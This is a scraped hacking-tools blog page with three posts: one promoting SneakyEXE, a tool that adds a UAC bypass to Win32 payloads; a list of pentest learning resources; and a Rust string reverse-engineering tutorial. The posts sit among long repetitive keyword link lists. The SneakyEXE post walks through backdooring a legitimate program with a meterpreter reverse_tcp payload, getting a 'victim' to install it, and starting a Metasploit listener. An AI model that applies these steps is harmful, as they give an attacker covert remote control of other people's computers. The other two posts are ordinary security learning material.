Sunday 30 August 2020

UserRecon Tool | Find Usernames | OSINT Tool

Read more


SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related links
  1. Hack Rom Tools
  2. Pentest Tools List
  3. Blackhat Hacker Tools
  4. New Hack Tools
  5. Hacker
  6. Hacking Tools Pc
  7. Hacking Tools Download
  8. Hack Tools For Pc
  9. Hack Rom Tools
  10. Hacker Tools For Mac
  11. Pentest Tools Github
  12. What Is Hacking Tools
  13. Hacking Tools Windows 10
  14. Best Pentesting Tools 2018
  15. Tools 4 Hack
  16. Hacker Tools Github
  17. Hacking Tools For Windows 7
  18. Pentest Tools Website Vulnerability
  19. Free Pentest Tools For Windows
  20. Install Pentest Tools Ubuntu
  21. Hackrf Tools
  22. Pentest Tools Linux
  23. Termux Hacking Tools 2019
  24. Hack Tools For Windows
  25. How To Hack
  26. Blackhat Hacker Tools
  27. Pentest Tools Subdomain
  28. Hacker Tools Windows
  29. Github Hacking Tools
  30. Pentest Tools Windows
  31. Hacking Tools For Windows
  32. Game Hacking
  33. Tools For Hacker
  34. Hacking Tools 2020
  35. Pentest Tools Free
  36. Pentest Tools Subdomain
  37. Usb Pentest Tools
  38. Usb Pentest Tools
  39. Hacker Techniques Tools And Incident Handling
  40. Hacker Tools Apk
  41. Best Hacking Tools 2020
  42. Blackhat Hacker Tools
  43. Physical Pentest Tools
  44. Bluetooth Hacking Tools Kali
  45. Pentest Tools For Mac
  46. Pentest Tools For Mac
  47. Hacking Tools Kit
  48. What Are Hacking Tools
  49. Hacker Security Tools
  50. Pentest Tools Framework
  51. Nsa Hack Tools
  52. Android Hack Tools Github
  53. Pentest Tools Website
  54. Hacker Tool Kit
  55. Hacking Tools Free Download
  56. Tools 4 Hack
  57. Hacker Tools Mac
  58. Hacker Tools Hardware
  59. Pentest Tools List
  60. Hacking Tools Download
  61. Pentest Reporting Tools
  62. Hacking Tools For Windows Free Download
  63. Hacker Tools Online
  64. Hacking Apps
  65. Hacking App
  66. How To Install Pentest Tools In Ubuntu
  67. Pentest Tools For Ubuntu
  68. Hacker Tool Kit
  69. Hack Website Online Tool
  70. Pentest Box Tools Download
  71. Pentest Reporting Tools
  72. Best Pentesting Tools 2018
  73. Pentest Tools For Ubuntu
  74. Hack Tools Online
  75. Hacker Tools
  76. Pentest Tools Alternative
  77. New Hacker Tools
  78. Hack And Tools
  79. Pentest Tools Tcp Port Scanner
  80. Pentest Tools Open Source
  81. Hacker Tools Free
  82. Hacking Apps
  83. Hack Tools
  84. Hacker Tools For Ios
  85. Tools Used For Hacking
  86. Hacker Tools Hardware
  87. Tools For Hacker
  88. Hacker Tools Mac
  89. Hacker Tools Linux
  90. Pentest Tools Alternative
  91. Hacking Apps
  92. Black Hat Hacker Tools
  93. Hacker Tools Mac
  94. Hak5 Tools
  95. Hacker Tools Free Download
  96. Hacking Tools Download
  97. Pentest Box Tools Download
  98. Hacker Tools Free
  99. Pentest Tools Website
  100. Hacking Tools Windows
  101. Hacking Tools Hardware
  102. Pentest Tools Port Scanner
  103. Nsa Hacker Tools
  104. Pentest Recon Tools
  105. What Are Hacking Tools
  106. Best Pentesting Tools 2018
  107. Pentest Tools For Mac
  108. Hacker Tool Kit
  109. Pentest Tools
  110. Nsa Hack Tools
  111. What Is Hacking Tools
  112. Tools For Hacker
  113. Hacker Tool Kit
  114. Hacker Tools 2020
  115. Pentest Tools For Ubuntu
  116. Install Pentest Tools Ubuntu
  117. Hacker Tools Free Download
  118. Hacking Tools Windows 10
  119. Pentest Tools Apk
  120. Hacking Tools 2020
  121. Hacker Search Tools
  122. Hacks And Tools
  123. Hacking Tools For Pc
  124. Hack Tools 2019
  125. What Are Hacking Tools
  126. Top Pentest Tools
  127. Pentest Tools Framework
  128. Nsa Hack Tools
  129. Hackrf Tools
  130. Hacking Tools For Beginners
  131. Hak5 Tools
  132. Hacking Tools For Kali Linux
  133. Hack Apps
  134. Best Hacking Tools 2020
  135. Hack Rom Tools
  136. Pentest Tools Windows
  137. Hack And Tools
  138. Pentest Tools Windows
  139. Pentest Tools
  140. Github Hacking Tools
  141. Bluetooth Hacking Tools Kali
  142. Pentest Tools Download
  143. Pentest Tools Bluekeep
  144. Tools Used For Hacking
  145. Pentest Tools Android
  146. Nsa Hack Tools
  147. Best Hacking Tools 2020
  148. Hacking Tools Hardware
  149. Hack Tools Mac
  150. Hack Tools Pc
  151. Growth Hacker Tools
  152. Hacks And Tools
  153. Hacks And Tools
  154. Pentest Recon Tools

Learning Resources For Hacking And Pentesting


In this article, I'm going to provide you a list of resources which I have found very useful. I don't remember all of them from top of my head so I might miss some. This list will be updated on usual basis. Hope you'll find some good stuff to learn. If you have got suggestions leave them down below in the comments section.

Free Hands on Labs:

1. Hack The Box - live machines to hack your way around. Besides boxes they have awesome challenges and great labs to try out.
2. TryHackMe - great way to learn pentesting while doing it. Lots of machines to hack and lots of ground to cover.
3. Portswigger Web Security Academy - learn web application pentesting.

Free Training (Mostly Introductory stuff):

1. Tenable University - training and certification on Nessus etc.
2. Palo Alto Networks - Palo Alto Networks offers an abundance of resources to prepare for there certifications. The training is free but the exams cost.
3. Open P-TECH - has an introductory course on Cybersecurity Fundamentals.
4. IBM Security Learning Academy - has many courses but focused on IBM security services and 
products.
5. Cisco Networking Academy - not all courses are free but Introduction to Cybersecurity and Cybersecurity Essentials are free.
6. AWS Training and Certification - has some free cloud security training courses.
7. Metasploit Unleashed - Free Online Ethical Hacking Course - Offensive Security's free online course on metasploit.
8. Coursera and Edx - you already know about them.

Blogs:

1. HackTricks - This is simply an awesome blog just visit it and you'll fall in love.
2. pentestmonkey - I visit it most of the time for one-liner reverse shells they are awesome.

Writeups:

1. 0xdf

YouTube:

1. ippsec - an awesome YouTube channel with tons of information in every video. New video comes out weekly as soon as the machine on hackthebox expires. https://ippsec.rocks for video searching
2. xct - short walkthroughs on hackthebox machines.
3. Cristi Vlad - advice and content on pentesting and python.
4. LiveOverflow - reverse engineering on steroids.
5. SANS Pen Test Training - SANS institute webinars and talks.
6. VbScrub - great pentesting videos.
7. BinaryAdventure - great pentesting and reverse engineering videos.
8. GynvaelEN - great videos and talks about CTFs and pentesting.

GitHub Repos:

1. PayloadsAllTheThings - heaven of hackers.
2. Pentest Monkey - reverse shells and more.

Related articles


Saturday 29 August 2020

Reversing Rust String And Str Datatypes

Lets build an app that uses several data-types in order to see how is stored from a low level perspective.

Rust string data-types

The two first main objects are "str" and String, lets check also the constructors.




Imports and functions

Even such a basic program links several libraries and occupy 2,568Kb,  it's really not using the imports and expots the runtime functions even the main. 


Even a simple string operation needs 544 functions on rust:


Main function

If you expected see a clear main function I regret to say that rust doesn't seem a real low-level language In spite of having a full control of the memory.


Ghidra turns crazy when tries to do the recursive parsing of the rust code, and finally we have the libc _start function, the endless loop after main is the way Ghidra decompiles the HLT instruction.


If we jump to main, we see a function call, the first parameter is rust_main as I named it below:



If we search "hello world" on the Defined Strings sections, matches at the end of a large string


After doing "clear code bytes" we can see the string and the reference:


We can see that the literal is stored in an non null terminated string, or most likely an array of bytes. we have a bunch of byte arrays and pointed from the code to the beginning.
Let's follow the ref.  [ctrl]+[shift]+[f] and we got the references that points to the rust main function.


After several naming thanks to the Ghidra comments that identify the rust runtime functions, the rust main looks more understandable.
See below the ref to "hello world" that is passed to the string allocated hard-coding the size, because is non-null terminated string and there is no way to size this, this also helps to the rust performance, and avoid the c/c++ problems when you forgot the write the null byte for example miscalculating the size on a memcpy.


Regarding the string object, the allocator internals will reveal the structure in static.
alloc_string function call a function that calls a function that calls a function and so on, so this is the stack (also on static using the Ghidra code comments)

1. _$LT$alloc..string..String$u20$as$u20$core..convert..From$LT$$RF$str$GT$$GT$::from::h752d6ce1f15e4125
2. alloc::str::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$str$GT$::to_owned::h649c495e0f441934
3. alloc::slice::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$$u5b$T$u5d$$GT$::to_owned::h1eac45d28
4. alloc::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::to_vec::h25257986b8057640
5. alloc::slice::hack::to_vec::h37a40daa915357ad
6. core::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::len::h2af5e6c76291f524
7. alloc::vec::Vec$LT$T$GT$::extend_from_slice::h190290413e8e57a2
8. _$LT$alloc..vec..Vec$LT$T$GT$$u20$as$u20$alloc..vec..SpecExtend$LT$$RF$T$C$core..slice..Iter$LT$T$GT$$GT$$GT$::spec_extend::h451c2f92a49f9caa
...


Well I'm not gonna talk about the performance impact on stack but really to program well reusing code grants the maintainability and its good, and I'm sure that the rust developed had measured that and don't compensate to hardcode directly every constructor.

At this point we have two options, check the rust source code, or try to figure out the string object in dynamic with gdb.

Source code

Let's explain this group of substructures having rust source code in the hand.
The string object is defined at string.rs and it's simply an u8 type vector.



And the definition of vector can be found at vec.rs  and is composed by a raw vector an the len which is the usize datatype.



The RawVector is a struct that helds the pointer to the null terminated string stored on an Unique object, and also contains the allocation pointer, here raw_vec.rs definition.



The cap field is the capacity of the allocation and a is the allocator:



Finally the Unique object structure contains a pointer to the null terminated string, and also a one byte marker core::marker::PhantomData



Dynamic analysis

The first parameter of the constructor is the interesting one, and in x64 arch is on RDI register, the extrange sequence RDI,RSI,RDX,RCX it sounds like ACDC with a bit of imagination (di-si-d-c)

So the RDI parámeter is the pointer to the string object:



So RDI contains the stack address pointer that points the the heap address 0x5578f030.
Remember to disable ASLR to correlate the addresses with Ghidra, there is also a plugin to do the synchronization.

Having symbols we can do:
p mystring

and we get the following structure:

String::String {
  vec: alloc::vec::Vec {
    buf: alloc::raw_vec::RawVec {
      ptr: core::ptr::unique::Unique {
        pointer: 0x555555790130 "hello world\000",
        _marker: core::marker::PhantomData
     },
     cap: 11,
     a: alloc::alloc::Global
   },
   len: 11
  }
}

If the binary was compiled with symbols we can walk the substructures in this way:

(gdb) p mystring.vec.buf.ptr
$6 = core::ptr::unique::Unique {pointer: 0x555555790130 "hello world\000", _marker: core::marker::PhantomData}

(gdb) p mystring.vec.len

$8 = 11

If we try to get the pointer of each substructure we would find out that the the pointer is the same:


If we look at this pointer, we have two dwords that are the pointer to the null terminated string, and also 0xb which is the size, this structure is a vector.


The pionter to the c string is 0x555555790130




This seems the c++ string but, let's look a bit deeper:

RawVector
  Vector:
  (gdb) x/wx 0x7fffffffdf50
  0x7fffffffdf50: 0x55790130  -> low dword c string pointer
  0x7fffffffdf54: 0x00005555  -> hight dword c string pointer
  0x7fffffffdf58: 0x0000000b  -> len

0x7fffffffdf5c: 0x00000000
0x7fffffffdf60: 0x0000000b  -> low cap (capacity)
0x7fffffffdf64: 0x00000000  -> hight cap
0x7fffffffdf68: 0xf722fe27  -> low a  (allocator)
0x7fffffffdf6c: 0x00007fff  -> hight a
0x7fffffffdf70: 0x00000005 

So in this case the whole object is in stack except the null-terminated string.




Related posts


  1. World No 1 Hacker Software
  2. Hack Apps
  3. Pentest Tools Tcp Port Scanner
  4. Hack Tools Github
  5. Termux Hacking Tools 2019
  6. Install Pentest Tools Ubuntu
  7. Hacker Tools Apk
  8. Hacker
  9. Hack Tools For Mac
  10. Pentest Tools List
  11. Pentest Tools Website Vulnerability
  12. Hack Tools For Ubuntu
  13. Hacking Tools Software
  14. Pentest Tools Bluekeep
  15. Pentest Tools Nmap
  16. Pentest Tools Website Vulnerability
  17. New Hack Tools
  18. Hacker Hardware Tools
  19. What Are Hacking Tools
  20. Pentest Reporting Tools
  21. Easy Hack Tools
  22. Hack Tools For Mac
  23. Hacker Tool Kit
  24. Hacking Tools Name
  25. Bluetooth Hacking Tools Kali
  26. Hacking Tools Windows
  27. Hacker Hardware Tools
  28. Physical Pentest Tools
  29. Pentest Automation Tools
  30. How To Hack
  31. How To Install Pentest Tools In Ubuntu
  32. Pentest Tools Website Vulnerability
  33. Physical Pentest Tools
  34. Hacker Hardware Tools
  35. Pentest Tools Kali Linux
  36. Hacking Tools For Windows 7
  37. Hack Tools For Pc
  38. How To Install Pentest Tools In Ubuntu
  39. Growth Hacker Tools
  40. Hacker Tools 2020
  41. Tools 4 Hack
  42. Hack Tools For Games
  43. Hacking Tools Online
  44. Hacking Tools Kit
  45. Hack Rom Tools
  46. Top Pentest Tools
  47. Hacker Tools List
  48. Hackers Toolbox
  49. Usb Pentest Tools
  50. Hacking Tools Online
  51. Pentest Tools Open Source
  52. Free Pentest Tools For Windows
  53. Pentest Tools List
  54. Hacking Tools Usb
  55. Physical Pentest Tools
  56. Hacking Tools Github
  57. Hacker Tools Github
  58. Install Pentest Tools Ubuntu
  59. Pentest Tools Linux
  60. Hack Tools
  61. World No 1 Hacker Software
  62. Kik Hack Tools
  63. Hacker Tools For Ios
  64. Usb Pentest Tools
  65. Pentest Tools List
  66. Hack App
  67. Hack Tools For Pc
  68. Hacking Tools Github
  69. Pentest Automation Tools
  70. Hacking Tools For Mac
  71. Pentest Tools For Windows
  72. Hacker Tools 2020
  73. Hack Tools 2019
  74. Pentest Reporting Tools
  75. Hacker Tools List
  76. World No 1 Hacker Software
  77. Bluetooth Hacking Tools Kali
  78. Tools Used For Hacking
  79. Hack And Tools
  80. Hacker Tools Free
  81. Best Hacking Tools 2019
  82. Kik Hack Tools
  83. Nsa Hack Tools
  84. Hacking Tools Windows 10
  85. Pentest Tools Free
  86. Pentest Box Tools Download
  87. Bluetooth Hacking Tools Kali
  88. Bluetooth Hacking Tools Kali
  89. Hacking Tools Hardware
  90. Hack And Tools
  91. Hack Tools For Mac
  92. Hacker Tools
  93. Hack Tools Online
  94. Hack Tools For Pc
  95. Pentest Tools Port Scanner
  96. Hacker Tools
  97. Hacking Tools And Software
  98. Hack Apps
  99. Hack Tools Pc
  100. Hacker Security Tools
  101. Pentest Tools Linux
  102. Hacker Tools For Ios
  103. Pentest Tools Review
  104. Pentest Tools Apk
  105. Hack Tools 2019
  106. Hacker Tools Hardware
  107. Hack Tool Apk
  108. Hacker Techniques Tools And Incident Handling
  109. Blackhat Hacker Tools
  110. Hacking Tools Github
  111. Hacker Hardware Tools
  112. Hackers Toolbox
  113. World No 1 Hacker Software
  114. Hack Tools For Ubuntu
  115. Install Pentest Tools Ubuntu
  116. Hack Tools Pc
  117. Termux Hacking Tools 2019
  118. Hacking Tools 2019
  119. Pentest Tools Alternative
  120. Usb Pentest Tools
  121. Pentest Tools
  122. Pentest Tools Online
  123. How To Make Hacking Tools
  124. Hacking Tools
  125. World No 1 Hacker Software
  126. Wifi Hacker Tools For Windows
  127. Hacker Tools Windows
  128. Hacker Tool Kit
  129. Hacking Tools For Mac
  130. Hacking Tools Online
  131. Hacking Tools Software
  132. Hacking Tools For Kali Linux
  133. Android Hack Tools Github
  134. Pentest Tools Open Source
  135. Hacking Apps
  136. Nsa Hack Tools
  137. Hack Tools
  138. Install Pentest Tools Ubuntu
  139. Hack Tools Mac
  140. Ethical Hacker Tools
  141. Hack Tools
  142. Usb Pentest Tools
  143. Android Hack Tools Github
  144. Pentest Reporting Tools
  145. Pentest Automation Tools
  146. Hacking Tools Download
  147. Hak5 Tools
  148. Hacking Tools Download
  149. World No 1 Hacker Software
  150. Hak5 Tools
  151. Pentest Tools Port Scanner
  152. Hack Tools 2019
  153. Hacking Tools Windows
  154. Blackhat Hacker Tools
  155. Hacking Tools 2020
  156. How To Make Hacking Tools
  157. Hacker Tools Free Download